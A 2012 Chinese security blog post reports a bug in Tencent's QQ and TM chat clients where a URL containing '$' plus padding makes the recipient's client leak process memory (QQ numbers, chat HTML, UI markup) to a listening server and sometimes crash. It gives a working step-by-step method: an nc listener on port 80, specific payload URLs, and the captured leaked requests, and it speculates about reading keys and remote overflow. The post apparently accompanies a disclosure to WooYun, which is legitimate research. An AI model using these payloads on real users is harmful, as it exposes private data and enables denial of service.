腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

腾讯 QQ、TM 聊天窗口远程读取对方进程内存数据漏洞、可导致远程溢出、拒绝服务攻击

漏洞描述:

这个我也不知道该下个什么定义、叫个什么名字好,暂且叫这个名字吧……

这个漏洞挺狗血的,发现过程也很巧合。

话说本站部分连接被伟大的GFW屏蔽了,所以在早上的时候,我把链接统一改成了一个很猥琐的格式……

例如:https://lcx.cc/?$=1910,(因为存在一些兼容问题,现在已经改成其他的了……)

然后,下午的时候,在群里发了链接,然后紧接着很多人反映QQ崩溃、或是无法访问!如下图:

腾讯 QQ、TM 聊天窗口远程读取对方进程内存数据漏洞

然后我很好奇,于是乎手动检查了下,发现了个奇怪的问题,如下图:

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

很明显,打开的 Url 地址完全错误!并且后边多了一串奇怪的字符……

这顿时勾起了我的兴趣,于是乎把玩了一番,得出了如下结论……

漏洞测试:

测试环境:TM2009 Beta3.2 + IE9 + Windows 7 旗舰版 32 位

实际上后来得出来的结论与测试环境没什么联系,完全是 QQ、TM 软件内部数据处理问题,QQ 以及 TM 均可以利用成功,更有一些版本的QQ直接崩溃!!

下边说测试方法,准备工具:准备企鹅(QQ号)两头,NC 或其他能做临时 Web 服务器的东西……

执行:nc -l -p 80,你懂的……

然后打开两个聊天窗口,使用其中一个发送以下字符串:

http://192.168.1.2/$0000

然后再另一个接收的聊天窗口打开该 Url(其实双方窗口都可以打开该地址,都会触发漏洞)

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

你会惊奇的发现:

GET /root@lcx.cc%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

Url 地址居然变成了:http://192.168.1.2/root@lcx.cc%3E,Holy, Shit!

后边的:root@lcx.cc> 是神吗????(后来得出结论,这是对方的QQ号……)

不明白中,好吧,继续测试:

http://192.168.1.2/$1,返回结果:

GET /para%E8%A3%9C%E2%88%A5 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

para%E8%A3%9C%E2%88%A5 这又是个啥??好吧,继续:

http://192.168.1.2/$000000000000000000000000000000000000000000000000000000000000000000000000000000000000

返回:

GET /7620ACE1-9C90-4E6A-9571-FE57A6A6DE69%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

7620ACE1-9C90-4E6A-9571-FE57A6A6DE69>,Yoooooooooooooooooooooo~ What The Fuck!

继续:

http://192.168.1.2/$000

http://192.168.1.2/$=000

http://192.168.1.2/$=00

返回:

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

哦呵呵呵呵呵呵,目测企鹅已经内部混乱了,我们继续,屌不炸,誓不罢休,哈哈哈哈……

http://192.168.1.2/$1111111100000000,返回:/link%3E,Url 解码为:/link>,是不是有点像Html标签?而且貌似还是超链接标签?继续……

http://192.168.1.2/$%E5%B1%8C%E7%82%B8%EF%BC%81,返回:

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

platform:CF_Only_Open_Safe_URL,越来越接近真相了哦,亲~

http://192.168.1.2/$%01%02%03%04%04%05%06%07%08%08%08%08%08%08%08%08%08%08%08%08%08%08

GET /%DF%8FPYD%DF%8F/hL%DF%8F%E7%8C%80%E7%90%80T%DF%8F%E6%A0%80%E6%BC%80/%DF%8F%
E4%8C%80%E7%94%80d%DF%8F%E6%A0%80%E6%A4%80l%DF%8F%E7%8C%80%E6%94%80t%DF%8F%E2%BC
%80%EF%BF%BD%7C%DF%8F%0Cs%C2%84%DF%8FTi%C2%8C%DF%8F HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

这次企鹅射了好大一段哦,是什么呢,稍后解释,继续蹂躏企鹅……

http://192.168.1.2/$0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

猜猜返回了什么?Look:

http://192.168.1.2/tr%20bkIndex=1%20bgColor=#fbfafa%20id=itemId_32%20onclick=SetCurSel(this)%20ondblclick%20='OnDbClickItem(this)'%20dCount=0><td><table%20cellspacing='0'%20cellpadding='0'><tr><td%20width='183'><object%20classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119'%20class=imgHead><param%20name='src'%20value='platformdata:Head\1.png'></object>306797777</td><td%20width='183'>306797777<td>2012/3/11%2010:47:52</td></tr></table></td></tr>

Url 解码后:

http://192.168.1.2/tr bkIndex=1 bgColor=#fbfafa id=itemId_32 onclick=SetCurSel(this) ondblclick ='OnDbClickItem(this)' dCount=0><td><table cellspacing='0' cellpadding='0'><tr><td width='183'><object classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119' class=imgHead><param name='src' value='platformdata:Head\1.png'></object>306797777</td><td width='183'>306797777<td>2012/3/11 10:47:52</td></tr></table></td></tr>

哈哈哈哈哈,企鹅聊天框的原始 Html 代码!!!(企鹅的聊天框是 Html 构架的)

企鹅快爆了,继续……

http://192.168.1.2/$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

http://192.168.1.2/$8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888880

返回:

http://192.168.1.2/items%3E%3Citem%20title=%22一个月未登录%22%20tips=%22该分组中一个月未登录好友%22%20value=%2231%22%20/%3E%3Citem%20title=%22三个月未登录%22%20tips=%22该分组中三个月未登录好友%22%20value=%2291%22%20/%3E%3Citem%20title=%22半年未登录%22%20tips=%22该分组中半年未登录好友%22%20value=%22184%22%20/%3E%3C/items%3E???

Url 解码后:

items><item title="一个月未登录" tips="该分组中一个月未登录好友" value="31" /><item title="三个月未登录" tips="该分组中三个月未登录好友" value="91" /><item title="半年未登录" tips="该分组中半年未登录好友" value="184" /></items>???

呵呵,这是神马数据???

返回数据:

http://192.168.1.2//A%3E%3C/font%3E%3Cfont%20style=%22font-size:20pt;font-family:'微软雅黑','MS%20Sans%20Serif',sans-serif;%22%20color='800040'%3E%3Cbr%3E%3Cbr%3E打开该链接……%3C/font%3E

Url 解码后:

http://192.168.1.2//A></font><font style="font-size:20pt;font-family:'微软雅黑','MS Sans Serif',sans-serif;" color='800040'><br><br>打开该链接……</font>

哈哈哈哈,腾讯打开连接那个框框的 Html 源码……

呵呵,更卧槽的是,随后,企鹅华丽的一声爆了,哦也……

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

重启QQ后,再次执行 2048 字节的数字 8:

GET /Canvas%3E%3Cbackground%3E%3CTexture%20colorize=%22true%22%20file=%22com.ten
cent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png%22%20drawMode=%229Grid%2
2/%3E%3C/background%3E%3CTexture%20file=%22com.tencent.qzoneres:Qzone_TipFrame_Q
zoneTipBack_clientBkg_hightlight.png%22%20Canvas.autoHeight=%22true%22%20Canvas.
autoWidth=%22true%22%20Canvas.anchor=%22RIGHTCENTER%22%20Canvas.margin=%220,0,-5
,-13%22/%3E%3C/Canvas%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.2
Connection: Keep-Alive

腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击

 /Canvas><background><Texture colorize="true" file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png" drawMode="9Grid"/></background><Texture file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png" Canvas.autoHeight="true" Canvas.autoWidth="true" Canvas.anchor="RIGHTCENTER" Canvas.margin="0,0,-5,-13"/></Canvas>

呵呵,腾讯内存泄露了……

不测试了,以此类推,很多的……

漏洞成因:

本人不是逆向狂牛,所以具体原因不明中……

但是,目测是腾讯在打开URL的时候,处理字符串问题,在碰到特殊符号“$”(美元符号)的时候,会产生计算错误,具体怎么产生的,目前不得而知。

但是结果可以知道,字符串长度计算错误,导致取数据的时候内存“错位”,把一块不相干的内存读取出来,并组成 Url,然后调用默认浏览器打开……

于是乎,就产生了这个蛋疼的漏洞,由于错误的内存读取操作很危险,所以很容易崩溃……

然后你就可以远程拒绝服务了……

可惜的是,该漏洞读取的内存位置,貌似不可控,反正很难定位,但是有部分字符串却是固定的读取位置。

测试的时候,有时候是对方昵称、QQ,有时候是聊天记录,有时候是群里某个QQ号,有时候是乱码(某个内存位置的无意义数据)……

在测试中,貌似只有这一个特殊符号生效,其他特殊符号均正常。

在该符号后边可以跟任何数据,随便什么,反正是填充位置的,让腾讯计算错误,越大越好,目测以数字为佳,字母或其他字符有时候无效。

利用方案:

可以远程读取对方进程内存,你只需要架一个简易Web服务器,能监听80端口即可,随便什么东西都行……

目前只能乱读一气,期待逆向大牛,如果可以精确控制读取位置,那么读取对方内存中的密匙指日可待了,你懂的……

而且本漏洞,貌似可以覆盖部分内存,所以,可能导致远程溢出……

就这样了,Fuck Gov……

已提交至乌云:

http://www.wooyun.org/bugs/wooyun-2010-05420/trace/af7f56ec622d95a4061760123db346ba

http://www.wooyun.org/bugs/wooyun-2012-05420

留言评论(旧系统):

鬼哥 @ 2012-03-20 23:02:22

测试了下QQ2011没这个问题。

本站回复:

QQ2011、QQ2012没有这个问题,其他未测。